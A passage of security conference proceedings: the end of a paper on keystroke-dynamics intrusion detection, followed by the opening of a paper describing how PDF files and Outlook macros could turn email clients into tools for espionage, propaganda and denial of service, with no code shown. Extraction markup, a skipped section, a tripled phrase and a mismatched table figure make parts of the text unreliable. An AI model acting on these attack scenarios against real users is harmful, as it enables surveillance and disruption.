mitigate their occurrences as much as possible.<br />
4. Related work<br />
In order to m<strong>in</strong>imize the aforementioned typ<strong>in</strong>g <strong>in</strong>stability, most research on published literature chooses<br />
to control the text used to produce samples, ask<strong>in</strong>g for usernames, passwords, or fixed text paragraphs<br />
(Rob<strong>in</strong>son et al., 1998; Lopatka and Peetz, 2009; Jiang, Shieh and Liu, 2007). It is believed that users<br />
tend to type familiar and well-practiced phrases with a more consistent rhythm (Rob<strong>in</strong>son et al., 1998).<br />
There are currently very few approaches to the keystroke analysis of unrestra<strong>in</strong>ed text. Ahmed and<br />
Traore (2005) obta<strong>in</strong>ed a False Acceptance Rate (FAR) of 1.312% and a False Rejection Rate (FRR) of<br />
0.651%, us<strong>in</strong>g trigraph-based keystroke analysis <strong>in</strong> conjugation with po<strong>in</strong>ter dynamics. Unfortunately, the<br />
<strong>in</strong>formation provided about the experimentation process is very scarce.<br />
Downland and Furnell (2004) monitorized 35 subjects for 3 months (nearly 6 million samples), obta<strong>in</strong><strong>in</strong>g a<br />
FRR of 4.9% for a FAR of 0%, which are very <strong>in</strong>terest<strong>in</strong>g results but obta<strong>in</strong>ed via a computational-heavy<br />
process that would be impossible to implement on a system that needs to provide quick responses.<br />
J.-D. Marsters (2009) developed a system for transparent keystroke analysis with a FAR of around 2%<br />
for a near-zero FRR and a small userbase of 10 participants. The author claims to be able to perform an<br />
identity verification <strong>in</strong> less than a m<strong>in</strong>ute, which is a result close to be<strong>in</strong>g acceptable for a “real” <strong>in</strong>trusion<br />
detection system.<br />
F<strong>in</strong>ally, Gunetti and Picardi (2005) thoroughly researched the impact of multiple parameter variations <strong>in</strong><br />
their study, obta<strong>in</strong><strong>in</strong>g (for a userbase of 205 participants) a very <strong>in</strong>terest<strong>in</strong>g FRR of less than 5% and FAR<br />
of less than 0.005% for their best-scor<strong>in</strong>g implementation. Their two-factor (absolute and relative) scor<strong>in</strong>g<br />
algorithm served as the basis for our proposed solution. Samples were obta<strong>in</strong>ed by fill<strong>in</strong>g an onl<strong>in</strong>e text<br />
box (which guarantees that nearly every sample will be constituted of real text), which can not be<br />
considered an unrestra<strong>in</strong>ed text <strong>in</strong>put – <strong>in</strong>clud<strong>in</strong>g cod<strong>in</strong>g, brows<strong>in</strong>g, gam<strong>in</strong>g, writ<strong>in</strong>g <strong>in</strong> different contexts<br />
and languages, etc.<br />
83
5. Proposed solution<br />
João Ferreira et al.<br />
Figure 1 depicts the architecture of our proposed solution. Like typical systems based on biometric<br />
technology, this solution <strong>in</strong>cludes an <strong>in</strong>itial enrollment phase, where the legitimate user is required to type<br />
a few l<strong>in</strong>es of text (sample length will be discussed throughout this section) so that sufficient sample data<br />
is gathered. From that po<strong>in</strong>t on, the system is ready to recognize legitimate use, and enters validation<br />
phase, the "normal" state that will be preserved dur<strong>in</strong>g operation.<br />
In this state, every validation attempt (every typed sample) will be matched aga<strong>in</strong>st the user's typ<strong>in</strong>g<br />
profile, outputt<strong>in</strong>g a score that will determ<strong>in</strong>e if the attempt is valid. An attempt that passes validation will<br />
be added to the stored profile, ensur<strong>in</strong>g that the user’s profile is constantly updated, accompany<strong>in</strong>g<br />
evolutions of the user’s typ<strong>in</strong>g dynamics). Attempts that fail to validate denunciate the presence of an<br />
<strong>in</strong>truder and will trigger the prevention and report<strong>in</strong>g module. In the next sections we detail each of the<br />
ma<strong>in</strong> modules of the proposed solution.<br />
Figure 1: Architecture of the proposed solution<br />
5.1 Event logg<strong>in</strong>g<br />
This module is a lightweight software agent runn<strong>in</strong>g <strong>in</strong> the background of every registered user’s<br />
computer. It cont<strong>in</strong>uously logs the sequence of keystroke events (keydowns and keyups) generated by<br />
the user’s typ<strong>in</strong>g, along with elapsed time measurements (with an accuracy of .01 milliseconds). This<br />
module is also responsible for filter<strong>in</strong>g out unwanted events, like function keys, modifier keys, auto-repeat<br />
events (when a key is depressed for more than half a second) and writ<strong>in</strong>g breaks. Table 1 exemplifies<br />
how the log looks like. The computational weight of this module needs to be kept at a m<strong>in</strong>imum level,<br />
s<strong>in</strong>ce “imprison<strong>in</strong>g” keystroke events for an exaggerated amount of time could lead to noticeable delays<br />
on the system-wide responsiveness of the keystrokes. This “typ<strong>in</strong>g lag” would bother the user and affect<br />
the desired transparency of the system. Therefore, the deep process<strong>in</strong>g work is delegated to other<br />
module when a full sample is logged.<br />
Table 1: Log from typ<strong>in</strong>g the word “apples”<br />
Down Up Time<br />
A 0<br />
A 6386<br />
P 14824<br />
P 11512<br />
P 5752<br />
L 6594<br />
P 4921<br />
L 9056<br />
E 4943<br />
E 5752<br />
S 5761<br />
S 7393<br />
84
João Ferreira et al.<br />
Establish<strong>in</strong>g the size of a sample is an important decision. Longer samples imply an <strong>in</strong>creased number of<br />
n-graphs, thus improv<strong>in</strong>g sample accuracy s<strong>in</strong>ce more shared n-graphs will be available for comparison<br />
(Gunetti and Picardi, 2005). However, shorter samples ensure a faster periodicity of the proposed<br />
solution’s process. We have opted for samples of 1500 events (around 750 characters), based on this<br />
trade-off.<br />
5.2 Sample process<strong>in</strong>g<br />
This module is responsible for convert<strong>in</strong>g the received raw sample log <strong>in</strong>to a structured and normalized<br />
sample. Table 2 illustrates how the logged samples (listed <strong>in</strong> the leftmost table) generate the subsamples<br />
used by this solution, regard<strong>in</strong>g different n-graphs.<br />
Table 2: Subsamples generated from the raw sample log<br />
Raw Sample Log Dwell Sample Flight Sample Digraph Sample<br />
Down Up Time Graph Time Graph Time Graph Time<br />
A 0 A 6386 A-P 14824 A+P 21210<br />
A 6386 E 5752 E-S 5761 E+S 11513<br />
P 14824 L 13977 L-E 4943 L+E 18920<br />
P 11512 P 11512,11515 P-L - 4921 P+L 6594<br />
P 5752 S 7393 P-P 5752 P+P 17264<br />
L 6594<br />
P 4921 Trigraph Sample Fourgraph Sample<br />
L 9056 Graph Time Graph Time<br />
E 4943 A+P+P 38474 A+P+P+L 45068<br />
E 5752 L+E+S 30433 P+L+E+S 37027<br />
S 5761 P+L+E 25514 P+P+L+E 42778<br />
S 7393 P+P+L 23858<br />
Note the presence of negative values on flight measurements. This is an example of overlapped typ<strong>in</strong>g<br />
(result of press<strong>in</strong>g the succeed<strong>in</strong>g key before releas<strong>in</strong>g the previous one), very common on most users’<br />
typ<strong>in</strong>g samples. Some users overlap a set of key comb<strong>in</strong>ations with extreme consistency, a differentiat<strong>in</strong>g<br />
factor worth exam<strong>in</strong><strong>in</strong>g.<br />
Once f<strong>in</strong>ished build<strong>in</strong>g the subsamples, execution proceeds by filter<strong>in</strong>g outliers – typical of every<br />
behavioral biometric traits, giv<strong>in</strong>g that human users as a source of data are naturally unpredictable.<br />
Outlier times are filtered out, apply<strong>in</strong>g the widely used Interquartile Range (IQR) formula. However, on a<br />
full sample, many graphs are typed just once. In these cases, we determ<strong>in</strong>e if their tim<strong>in</strong>g measure is <strong>in</strong><br />
fact an outlier regard<strong>in</strong>g every other n-graph <strong>in</strong> its subsample – for example, if all trigraph times <strong>in</strong> a<br />
user’s sample (there are around 500 trigraphs per sample) vary between 20000 and 40000, it is safe to<br />
assume that a trigraph with a time of 80000 is not natural to that user.<br />
F<strong>in</strong>ally, this module calculates the mean and standard deviation for each graph, and outputs a fully<br />
processed user sample (subsamples similar to the ones on Figure 2, now with fields for mean, standard<br />
deviation and number of occurrences, <strong>in</strong>stead of Time). If the user is new to the system (enrollment<br />
phase), the sample goes straight to the user’s profile stored <strong>in</strong> database. In our proposed solution, a<br />
s<strong>in</strong>gle stored sample is enough for the system to f<strong>in</strong>ish the enrollment phase and proceed to the<br />
validation phase. However, the decisions’ accuracy <strong>in</strong>creases with more samples <strong>in</strong> storage, should the<br />
user be will<strong>in</strong>g to certify that he is the only one typ<strong>in</strong>g on the computer (a requisite dur<strong>in</strong>g enrollment<br />
phase) for a longer period of time. The number of stored samples needed to enter the validation phase is<br />
customizable. If the user is already registered the system will be <strong>in</strong> validation phase – as a consequence,<br />
the sample will be labeled as an authentication attempt, and sent to the Scores Calculation module.<br />
5.3 Scores calculation<br />
At this stage, we have a structured sample (the attempt) ready for evaluation. All samples from the user<br />
profile <strong>in</strong> a centrally managed database are imported to the application <strong>in</strong> order to perform the necessary<br />
comparisons. Sample length is a very important factor on the accuracy of a free text keystroke dynamics<br />
algorithm (Gunetti and Picardi 2005; Hempstalk 2009), which is understandable, ma<strong>in</strong>ly because longer<br />
profile samples will share more n-graphs with the attempts. On the other hand, long samples force longer<br />
enrollment periods, make the system less responsive <strong>in</strong> passive mode (longer listen<strong>in</strong>g periods, and<br />
consequently fewer validation stages), and provide a coarse update of the user’s typ<strong>in</strong>g evolution.<br />
85
João Ferreira et al.<br />
Therefore, published solutions end up compromis<strong>in</strong>g with sett<strong>in</strong>g an average sample length, never<br />
benefit<strong>in</strong>g from the advantages of both short and long samples.<br />
Our proposed scor<strong>in</strong>g module derives from the idea that it is possible to benefit from the user’s longest<br />
possible sample for comparison, keep<strong>in</strong>g the system iterat<strong>in</strong>g with reasonably short samples – like the<br />
1500-event samples on which the proposed algorithm is based. Dur<strong>in</strong>g the calculation of scores, the<br />
1500-event attempt sample will be compared aga<strong>in</strong>st a unified user signature – a long sample with the<br />
merged <strong>in</strong>formation of every 1500-event sample stored by that user. With this, the maximum amount of ngraphs<br />
will be shared with the attempt, which consequently improves accuracy. Moreover, this merge is<br />
done with a very low process<strong>in</strong>g cost.<br />
Each sample n-graph conta<strong>in</strong>s its average ( ), standard deviation ( ) and hit count (n). For a merged<br />
sample with the comb<strong>in</strong>ation (C) of two samples (sample 1 and 2), these values are obta<strong>in</strong>ed with the<br />
formulas shown on Figure 2.<br />
Figure 2: Obta<strong>in</strong><strong>in</strong>g average, standard deviation and hit count for a merged sample<br />
With the merged sample and the attempt sample ready for comparison, the next step is to filter out all the<br />
graphs that are not shared between them – these samples come from unrestra<strong>in</strong>ed text <strong>in</strong>put, and<br />
therefore are likely to not share every occurrence.<br />
Our scor<strong>in</strong>g algorithm is based on two measurements: absolute and relative comparisons. While absolute<br />
comparisons rely solely on tim<strong>in</strong>g values for identity evaluation, relative comparisons refer to the order of<br />
a user’s typ<strong>in</strong>g – the underly<strong>in</strong>g rationale be<strong>in</strong>g the belief that if a legitimate user is known to type a<br />
certa<strong>in</strong> n-graph faster than another (e.g. if he types the trigraph “for” faster than “spa”), he will keep<br />
consistently do<strong>in</strong>g so, no matter the speed of his typ<strong>in</strong>g.<br />
The global score of a sample is an average between the absolute and relative scores, as detailed below.<br />
5.3.1 Absolute comparisons<br />
For each shared graph, we compare the difference between the averages of the attempt and the sample.<br />
If this difference falls below a certa<strong>in</strong> threshold, the graph comparison is labeled as a success, be<strong>in</strong>g a<br />
failure otherwise. Threshold sett<strong>in</strong>g is a key decision <strong>in</strong> this measurement.<br />
The human user does not write every text segment with the same tim<strong>in</strong>g stability. On his typ<strong>in</strong>g<br />
dynamics, he becomes so used to perform<strong>in</strong>g certa<strong>in</strong> f<strong>in</strong>ger movements, that they become almost<br />
automatic (hence the resort to fixed and frequently typed samples on most keystroke dynamics<br />
solutions). This is a behavior that can be explored, by reduc<strong>in</strong>g the acceptance threshold value for graphs<br />
the user is known to perform consistently (that is, with the lowest standard deviation values). While the<br />
legitimate user will still easily qualify his graphs, an attacker will most likely fail due to the reduced<br />
acceptance w<strong>in</strong>dow. These graphs are called consistent graphs.<br />
For each registered user, the database keeps and updates a record of their most consistent graphs (the<br />
10% most consistent), on every subsample. This record is retrieved when the user profile is imported for<br />
comparison. When compar<strong>in</strong>g a shared graph, the threshold to apply will be determ<strong>in</strong>ed by presence on<br />
that record. By default, we use 1.25 as the regular threshold value, and 1.10 as the threshold for the<br />
consistent graphs. These thresholds will then be adjusted depend<strong>in</strong>g on each user’s tim<strong>in</strong>g stability.<br />
86
João Ferreira et al.<br />
The absolute score of each subsample will be a success ratio of the comparisons carried out. F<strong>in</strong>ally, the<br />
f<strong>in</strong>al “absolute score” of a sample will be the weighted sum of each subsample score. The weight of each<br />
subsample (currently equally weighted) will be determ<strong>in</strong>ed by a later impact analysis.<br />
This process is illustrated on Table 3.<br />
Table 3: Illustration of absolute scores comparisons<br />
Profile Sample Attempt<br />
Sample<br />
Time Graph Time Success Failure<br />
38474 A+P+P 21402 38474/21402 = 1.798 X<br />
30433 L+E+S 37022 37022/30433 = 1.217 X<br />
25514 P+L+E* 29571 27571/25514 = 1.159 X<br />
23858 P+P+L 33200 33200/23858 = 1.392 X<br />
* - marked as a consistent graph<br />
We can see an example of a comparison that successfully made the regular threshold (
5.5 Profile updat<strong>in</strong>g<br />
João Ferreira et al.<br />
This module is triggered <strong>in</strong> case an attempt is successfully validated. A valid 1500-event sample will be<br />
stored <strong>in</strong> database alongside the rest of the user’s samples, to ensure that the user profile rema<strong>in</strong>s up-todate<br />
with the user’s typ<strong>in</strong>g dynamics modifications along the time. The number of 1500-event samples<br />
stored for each user is limited to 15 samples, tak<strong>in</strong>g <strong>in</strong>to consideration the computational weight of the<br />
scor<strong>in</strong>g process. When the stored profile is already constituted by 15 samples, the oldest will be erased<br />
to give way for the new one.<br />
5.6 Prevention and report<strong>in</strong>g<br />
The Prevention and Report<strong>in</strong>g module is triggered <strong>in</strong> case an attempt sample fails to validate, <strong>in</strong>dicat<strong>in</strong>g<br />
the probable presence of an <strong>in</strong>truder.<br />
5.6.1 Report<strong>in</strong>g measures<br />
Intrusions will be reported to a security log supervised by a security adm<strong>in</strong>istrator. This solution uses the<br />
attempt sample score’s distance to the threshold of user authentication as the <strong>in</strong>dicator for the Alarm<br />
Level of an <strong>in</strong>trusion detection – the rationale is that an <strong>in</strong>truder that scores far off the acceptance<br />
threshold is much more probably an <strong>in</strong>truder, than someone who scored below the acceptance threshold<br />
by a small marg<strong>in</strong>. With <strong>in</strong>trusions be<strong>in</strong>g logged with three alarm degrees (Yellow, Orange, and Red, with<br />
ascend<strong>in</strong>g severity), the security adm<strong>in</strong>istrator will be able to prioritize his reaction to the <strong>in</strong>trusions<br />
detected, and the problem of exaggerated False Alarms – an endemic problem of all IDSs (Axelsson,<br />
1999) – can be alleviated through this mechanism.<br />
5.6.2 Prevention measures<br />
Current solutions, as well as this one, trigger an identity verification procedure each time a sample is<br />
logged – what we call synchronous verifications. However, the larger number of n-graphs shared per<br />
sample (resultant from this solution’s adoption of a merged imported user profile) allow for a trustable<br />
identity verification even with shorter-sized samples, as long as a certa<strong>in</strong> (to be determ<strong>in</strong>ed through<br />
experimentation) number of shared n-graphs is detected.<br />
This creates an opportunity for prevention mechanisms, <strong>in</strong>tegrat<strong>in</strong>g with exist<strong>in</strong>g software applications <strong>in</strong><br />
order to trigger asynchronous verifications. For example, with a package like Microsoft Office, whenever<br />
a user saves a document or sends an eMail, a verification process can be triggered to ensure this is an<br />
action performed by the legitimate user. At that phase, the system is most certa<strong>in</strong>ly still <strong>in</strong> the process of<br />
logg<strong>in</strong>g a 1500-event sample, but nevertheless it can be able to perform a valid decision. Insufficient<br />
number of shared n-graphs detected dur<strong>in</strong>g the asynchronous verification is an <strong>in</strong>dicator (along with the<br />
last sample’s timestamp) that the last synchronous decision may be recent enough for usage.<br />
5.7 <strong>Security</strong> concerns<br />
The fact that this biometric assessment encompasses a keystroke monitor<strong>in</strong>g agent is per se a reason for<br />
user apprehension (particularly s<strong>in</strong>ce malicious keystroke loggers became ubiquitous). This solution<br />
would pose a greater security risk than the orig<strong>in</strong>al problem it tries to address, if the text typed by every<br />
user could be reproducible. Therefore, mak<strong>in</strong>g sure that none of the mentioned attacks are possible is<br />
critical to the relevance of the method and to the acceptability of the solution.<br />
Keystrokes are stored as a hash value (us<strong>in</strong>g SHA-256), and the orig<strong>in</strong>al keystroke identifiers are<br />
masked before hash<strong>in</strong>g (otherwise known-pla<strong>in</strong>text attacks would be trivial). Samples are sent to the<br />
server <strong>in</strong> large chunks of data, prevent<strong>in</strong>g typ<strong>in</strong>g sequence to be recovered. S<strong>in</strong>ce stored samples feature<br />
the hit count of each graph, attacks based on frequency analysis are a possibility. However, these are<br />
strongly based on language, and normally restricted to alphabetical keys and real text <strong>in</strong>put – our<br />
samples, be<strong>in</strong>g generated from unrestra<strong>in</strong>ed typ<strong>in</strong>g, do not set language restrictions, refer not only to real<br />
text <strong>in</strong>put but also to any other typ<strong>in</strong>g tasks (such as cod<strong>in</strong>g or gam<strong>in</strong>g), and monitor non-alphabetical<br />
(and even non-alphanumerical) keys. Therefore, the chance of text reproduction us<strong>in</strong>g this technique is<br />
also significantly reduced. Without text reproduction, these samples are unusable, even if stolen. Still,<br />
studies have demonstrated that even with full knowledge of a user typ<strong>in</strong>g habit, learn<strong>in</strong>g and reproduc<strong>in</strong>g<br />
it is a very difficult task (Rundhaug, 2007).<br />
88
João Ferreira et al.<br />
Key masks and hash values are not reflected on the tables and figures of this article, <strong>in</strong> order to facilitate<br />
their comprehension.<br />
6. Experimental environment<br />
For validation purposes, a prototype version of the proposed solution featur<strong>in</strong>g just the Event Logg<strong>in</strong>g<br />
and Sample Process<strong>in</strong>g functionalities (aim<strong>in</strong>g the capture of samples) was <strong>in</strong>stalled on several<br />
computers, <strong>in</strong> a real organization. This application is automatically executed when the user logs <strong>in</strong> the<br />
system and is completely transparent – runs <strong>in</strong> the background without ever giv<strong>in</strong>g signs of its presence.<br />
The captured samples will serve as <strong>in</strong>put to the Scores Calculation module (a centralized unit dur<strong>in</strong>g this<br />
experimental phase).<br />
Samples are be<strong>in</strong>g captured dur<strong>in</strong>g the users’ sessions with absolutely no restrictions on text <strong>in</strong>put –<br />
users are produc<strong>in</strong>g samples while writ<strong>in</strong>g eMails, post<strong>in</strong>g <strong>in</strong> forums, cod<strong>in</strong>g, writ<strong>in</strong>g <strong>in</strong> Portuguese (native<br />
language) or <strong>in</strong> English, etc. Each sample has a fixed length of 1500 events (around 750 characters).<br />
Each user will log up to 15 samples. The program is currently <strong>in</strong>stalled on a user base of around 200<br />
participants – result<strong>in</strong>g <strong>in</strong> 15 legitimate attempts and around 2985 (199 <strong>in</strong>truders, each register<strong>in</strong>g 15<br />
samples) <strong>in</strong>trusion attempts for each user.<br />
A thorough analysis of the results from this experiment will be posted <strong>in</strong> a subsequent report. This will be<br />
an important step to retrieve statistically relevant metrics <strong>in</strong> order to optimize the model design and the<br />
algorithm’s performance. The most relevant, as with any IDS, will be the False Acceptance and False<br />
Rejection Rates (FAR/FRR) – global and for each subsample.<br />
7. Conclusion and future work<br />
In this paper we have proposed a solution to perform anomaly-based <strong>in</strong>trusion detection through the use<br />
of keystroke dynamics biometrics. Some approaches were <strong>in</strong>troduced based on published literature. The<br />
proposed solution <strong>in</strong>cludes several improvements, namely on the filter<strong>in</strong>g of unrestra<strong>in</strong>ed text <strong>in</strong>put,<br />
sample organization, scores calculation, decision process and the ability of asynchronous profile<br />
evaluation. The experimentation period will allow for ref<strong>in</strong>ements on which we believe is already an<br />
<strong>in</strong>terest<strong>in</strong>g new step <strong>in</strong> the area. Study<strong>in</strong>g the benefits of the addition of po<strong>in</strong>ter dynamics measurements,<br />
a popular complement to keystroke dynamics, is also an objective for the future.<br />
In recent years, the way a human user <strong>in</strong>teracts with computers is be<strong>in</strong>g progressively transferred to<br />
touch <strong>in</strong>terfaces. With current tendencies, we can no longer be sure of the presence of physical<br />
keyboards <strong>in</strong> every computer on the next five or ten years. However, virtual keyboards also provide the<br />
tim<strong>in</strong>g measures used to build the current keystroke dynamics solutions. Successfully port<strong>in</strong>g this solution<br />
to virtual <strong>in</strong>terfaces is a challeng<strong>in</strong>g possibility worth explor<strong>in</strong>g <strong>in</strong> future works.<br />
References<br />
Ahmed, A.A.E. and Traore, I. (2005) 'Anomaly Intrusion Detection Based on Biometrics', Proceed<strong>in</strong>gs from the Sixth<br />
Annual IEEE SMC , West Po<strong>in</strong>t, 452-453. BIBLIOGRAPHY \l 2070<br />
Axelsson, S. (1999) 'The base-rate fallacy and its implications for the difficulty of <strong>in</strong>trusion detection', Proceed<strong>in</strong>gs of<br />
the 6th ACM conference on Computer and communications security, New York, 1-7.<br />
Bergadano, F., Gunetti, D. and Picardi, C. (2002) 'User authentication through keystroke dynamics', ACM<br />
Transactions on Information and System <strong>Security</strong>, vol. 5, no. 4, November, pp. 367 - 397.<br />
Ch<strong>in</strong>chani, R., Iyer, A., Ngo, H.Q. and Upadhyaya, S. (2005) 'Towards a Theory of Insider Threat Assessment', 2005<br />
International Conference on Dependable Systems and Networks (DSN'05), 108-117.<br />
Dowland, P.S. and Furnell, S.M. (2004) 'A Long-Term Trial of Keystroke Profil<strong>in</strong>g Us<strong>in</strong>g Digraph, Trigraph and<br />
Keyword Latencies', <strong>Security</strong> and Protection <strong>in</strong> Information Process<strong>in</strong>g Systems, vol. 147, pp. 275-289.<br />
Gunetti, D. and Picardi, C. (2005) 'Keystroke Analysis of Free Text', ACM Transactions on Information and System<br />
<strong>Security</strong>, vol. 8, no. 3, August, pp. 312-347.<br />
Hempstalk, K., 2009. Cont<strong>in</strong>uous Typist Verification us<strong>in</strong>g Mach<strong>in</strong>e Learn<strong>in</strong>g.<br />
Iwasaki, K., Miyaki, T. and Rekimoto, J. (2009) 'Expressive typ<strong>in</strong>g: a new way to sense typ<strong>in</strong>g pressure and its<br />
applications', Proceed<strong>in</strong>gs of the 27th <strong>in</strong>ternational conference extended abstracts on Human factors <strong>in</strong><br />
comput<strong>in</strong>g systems , Boston, 4369-4374.<br />
Jiang, C.-H., Shieh, S. and Liu, J.-C. (2007) 'Keystroke statistical learn<strong>in</strong>g model for web authentication', Proceed<strong>in</strong>gs<br />
of the 2nd ACM symposium on Information, computer and communications security, New York, 359-361.<br />
Liu, S. and Silverman, M. (2001) 'A Practical Guide to Biometric <strong>Security</strong> Technology', IT Professional, vol. 3, no. 1,<br />
pp. 27-32.<br />
Lopatka, M. and Peetz, M.-H. (2009) 'Vibration Sensitive Keystroke Analysis ', Proceed<strong>in</strong>gs of the 18th Annual<br />
Belgian-Dutch Conference on Mach<strong>in</strong>e Learn<strong>in</strong>g, Tilburg, 75-80.<br />
89
João Ferreira et al.<br />
Lynch, D.M. (2006) 'Secur<strong>in</strong>g Aga<strong>in</strong>st Insider Attacks', Information <strong>Security</strong> Journal: A Global Perspective, vol. 15,<br />
no. 5, November, pp. 39-47.<br />
Magalhães, P.S., 2005. Estudo dos Padrões de Digitação e Sua Aplicação na Autenticação Biométrica.<br />
Marsters, J.-D., 2009. Keystroke Dynamics as a Biometric. Available at: http://epr<strong>in</strong>ts.soton.ac.uk/66795/.<br />
Monrose, F. and Rub<strong>in</strong>, A.D. (2000) 'Keystroke dynamics as a biometric for authentication', Future Generation<br />
Computer Systems - Special issue on security on the Web, vol. 16, no. 4, February, pp. 351-359.<br />
Rob<strong>in</strong>son, J.A., Liang, V.W., Chambers, J.A.M. and MacKenzie, C.L. (1998) 'Computer user verification us<strong>in</strong>g log<strong>in</strong><br />
str<strong>in</strong>g keystroke dynamics ', IEEE Transactions on Systems, Man, and Cybernetics, Part A: Systems and<br />
Humans, vol. 28, no. 2, March, pp. 236-241.<br />
Rundhaug, F.E.N., 2007. Keystroke Dynamics - Can Attackers Learn Someone's Typ<strong>in</strong>g Characteristics.<br />
Schneier, B. (2009) 'Thwart<strong>in</strong>g an Internal Hacker', The Wall Street Journal, 16 February.<br />
Schultz, E.E. (2002) 'A Framework for Understand<strong>in</strong>g and Predict<strong>in</strong>g Insider Attacks', Computers & <strong>Security</strong>, vol. 21,<br />
no. 6, October, pp. 526-531.<br />
90
Pervert<strong>in</strong>g eMails: A new Dimension <strong>in</strong> Internet (<strong>in</strong>) <strong>Security</strong><br />
Eric Filiol, Jonathan Dechaux and Jean-Paul Fiza<strong>in</strong>e<br />
ESIEA - Operational virology and cryptology laboratory, France<br />
filiol@esiea.fr<br />
https://sites.google.com/site/ericfiliol/<br />
Abstract: Electronic mail (or email) has not just changed the way we communicate <strong>in</strong> our daily life; it has<br />
transformed the way we do bus<strong>in</strong>ess today. Considered a convenient, powerful and a low cost tool, it is widely used<br />
to convey all k<strong>in</strong>d of <strong>in</strong>formation <strong>in</strong>clud<strong>in</strong>g -unfortunately - sensitive or confidential <strong>in</strong>formation such as passwords,<br />
personal data, and private <strong>in</strong>formation. In recent times, two emerg<strong>in</strong>g technologies, referred to as the cloud<br />
comput<strong>in</strong>g and browser-based email technologies, have ga<strong>in</strong>ed popularity among users and, along the way, also<br />
added a new significant layer of risk: It is common practice now from users to store their passwords <strong>in</strong>to email folders<br />
and even worse, most of those browsers store and remember your password to open your email account<br />
automatically. Let’s imag<strong>in</strong>e the consequences of an attack launched by cybercrim<strong>in</strong>als designed to resend and<br />
divert the orig<strong>in</strong>al functionalities and features <strong>in</strong>herent to the browser for any malicious purpose, or worse - terrorist<br />
attempts. Let’s take for example a US military officer operat<strong>in</strong>g <strong>in</strong> a country at war such as Afghanistan simply<br />
send<strong>in</strong>g emails to his family to keep <strong>in</strong> touch with them. Whenever he sends an email, thousands of emails<br />
conta<strong>in</strong><strong>in</strong>g racial slurs aga<strong>in</strong>st Muslim people are automatically sent to Afghan troops from his web account without<br />
him know<strong>in</strong>g it. The consequences of such an action would be unquestionably devastat<strong>in</strong>g. This above example,<br />
though fictitious, illustrates how efficient this k<strong>in</strong>d of emails could be for both war propaganda and deception<br />
operations aga<strong>in</strong>st US troops. Now imag<strong>in</strong>e a company ‘s decision maker who daily exchanges large amounts of<br />
emails conta<strong>in</strong><strong>in</strong>g sensitive or confidential <strong>in</strong>formation with<strong>in</strong> and outside his company rang<strong>in</strong>g from trade secrets,<br />
contracts details, customer lists, research reports, f<strong>in</strong>ancial <strong>in</strong>formation to staff’s personal details. Modify<strong>in</strong>g the<br />
browser-based email technology could enable any ill-<strong>in</strong>tended person to wiretap and to eavesdrop any email directly<br />
at the browser’s level to record any sent data and to make them evade from the computer towards unscrupulous<br />
people. The collection of the daily flow of emails, both <strong>in</strong>ternally and externally, def<strong>in</strong>itely provides a snapshot of a<br />
company's overall culture and is prov<strong>in</strong>g to be a powerful and efficient tool used for both <strong>in</strong>dustrial and economic<br />
espionage. As a last example, these technologies once modified, could be used to set up thousand of zombies <strong>in</strong><br />
mail clients. For that purpose, a large number of email clients would simultaneously send thousands of mails to a<br />
s<strong>in</strong>gle target – e.g. an email server -- to deny mail service for a limited period of time. We can easily imag<strong>in</strong>e that this<br />
k<strong>in</strong>d of attack launched on any stock exchange computer systems would entail damag<strong>in</strong>g economic repercussions<br />
for the affected country and would probably plunge it <strong>in</strong>to chaos for some time. In this paper, we will expla<strong>in</strong> and<br />
show that email can be used as a ideal weapon for terrorism, cyber warfare, espionage, denial of service and can<br />
cripple all sectors of economy and nation states. We will address these issues both at the technical and operational<br />
level. In any case, we have considered systems with the most restricted user’s privileges, but mak<strong>in</strong>g those attacks<br />
really easy and powerful.<br />
Keywords: eMail, terrorism, cyber-attack, espionage, email client, browsers, cyber warfare<br />
1. Introduction<br />
In recent years, companies, governments and <strong>in</strong>stitutions have been fac<strong>in</strong>g new threats especially due to<br />
the ever-grow<strong>in</strong>g menace of cyber-terrorism which takes place on a new space. This ongo<strong>in</strong>g threat has<br />
plunged the world <strong>in</strong>to a permanent cyber warfare state, with the power to keep the victims at war for the<br />
<strong>in</strong>def<strong>in</strong>ite future.<br />
The most common and typical threats today are <strong>in</strong>dustrial, government or military espionage and the<br />
disruption of <strong>in</strong>stitutions us<strong>in</strong>g denial of service attacks. However, other risks are emerg<strong>in</strong>g and the new<br />
cyber-crim<strong>in</strong>als’ playground is <strong>in</strong>formation manipulation rang<strong>in</strong>g from propaganda war to dis<strong>in</strong>formation or<br />
surfeit of <strong>in</strong>formation. In this field, the targets are manifold and the cyber-crim<strong>in</strong>als beh<strong>in</strong>d the operations<br />
may belong to government <strong>in</strong>stitutions or small groups. Recent attacks on governmental communication<br />
networks showed that one of the ma<strong>in</strong> entry po<strong>in</strong>ts used is an office solution. Last attacks on German<br />
chancellery or on the f<strong>in</strong>ancial European system have been unfortunately successful. Surveys showed<br />
that both attacks were based on divert<strong>in</strong>g the macro documents away from their orig<strong>in</strong>al use.<br />
Other office applications can be used, such as email management software. Our focus here is to show<br />
how outlook software which uses macros to operate turns out to be an excellent tool to launch a massive<br />
attack ma<strong>in</strong>ly because it is one of the most commonly used products on the market. Our purpose is to<br />
demonstrate through three proofs of concepts, how cyber-crim<strong>in</strong>als can misuse email software to perform<br />
malicious acts related to cyber terrorism or cyber warfare. These attacks only require the use of office<br />
documents - <strong>in</strong> PDF format exclusively - as attack vectors. Other proofs of concepts based on PDF files<br />
91
Eric Filiol et al.<br />
exist as well and have been studied by (Blonce et al. 2008) and <strong>in</strong> (Stevens 2010). Other attacks based<br />
on the use of malicious macros have also been <strong>in</strong>troduced <strong>in</strong> (Dechaux et al. 2010a; 2010b).<br />
As a first step, we will study the structure of a PDF file and then show how it can be misused to weaken<br />
the victim. As a second step, we will review the ma<strong>in</strong> features of outlook, and then highlight the<br />
configuration weaknesses enabl<strong>in</strong>g a macro to be transparently executed. Given the perennial nature of<br />
the attack (the purpose here is not to exploit any software vulnerability), we will describe the <strong>in</strong>fection<br />
mechanism <strong>in</strong>herent to the PDF language. The <strong>in</strong>fection is actually based on various strategies and our<br />
goal is to demonstrate how the PDF language can be used <strong>in</strong> an attack situation. The next step is to<br />
show that once the victim is weakened, the macro can be executed <strong>in</strong> a transparent way.<br />
At last, we will consider how cyber-crim<strong>in</strong>als can operate mail server attacks, perform espionage<br />
activities, or launch propaganda wars though a misuse of email software though a misuse of email<br />
software though a misuse of email software.<br />
This paper is organized as follows. Section 2 presents the basics about office documents and a few<br />
technical aspects around PDF format, JavaScript, Microsoft Office and OpenOffice macros and the<br />
security of those macros. Section 3 exposes how our attack is prepared and which k<strong>in</strong>d of <strong>in</strong>fection vector<br />
